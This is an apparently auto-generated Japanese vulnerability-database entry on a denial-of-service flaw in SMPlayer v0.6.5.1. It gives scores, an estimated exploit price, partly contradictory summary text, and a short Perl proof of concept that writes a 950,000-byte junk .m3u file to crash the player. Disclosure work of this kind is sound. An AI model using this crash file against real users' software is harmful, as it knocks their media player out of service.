SMPlayer v0.6.5.1 サービス拒否

CVSS 一時的なメタスコア	現在のエクスプロイト価格 (≈)	CTI注目指数
3.0	$0-$5k	0.00

要約情報

脆弱性が問題があるとして分類され、SMPlayer v0.6.5.1で発見されました。影響を受けるのは、未知の関数です。この操作は、サービス拒否を引き起こします。攻撃手法は利用できません。

脆弱性が問題があるとして分類され、SMPlayer v0.6.5.1で発見されました。影響を受けるのは、未知の関数です。この操作は、サービス拒否を引き起こします。 CWEを使用して問題を宣言すると、CWE-404 につながります。この脆弱性は 2011年06月16日に公開されました、VL-ID 57として、勧告として（ウェブサイト）。アドバイザリはvulnerability-lab.comでダウンロードできます。

技術詳細は存在しません。この脆弱性の普及度は平均未満です。攻撃手法は利用できません。このエクスプロイトは一般に公開されており、利用される恐れがあります。エクスプロイトツールの現在の価格はおそらく米ドルで約$0-$5kです。

概念実証として設定されています。エクスプロイトツールは vulnerability-lab.com にダウンロードのために共有されています。 0-dayとして、アンダーグラウンドでの推定価格は$0-$5k程度でした。このエクスプロイトが利用したコードは以下の通りです：

my $sploitfile="name.m3u";
print " [+] Preparing payload\n";
my $junk = "A" x 950000;
my $payload = $junk;
print " [+] Writing payload to file\n";
open(sploitf,">$sploitfile");
print sploitf $payload;
close(sploitf);
print " [+] Exploit file " . sploitfile . " created\n";
print " [+] Wrote " . length($payload) . " bytes\n";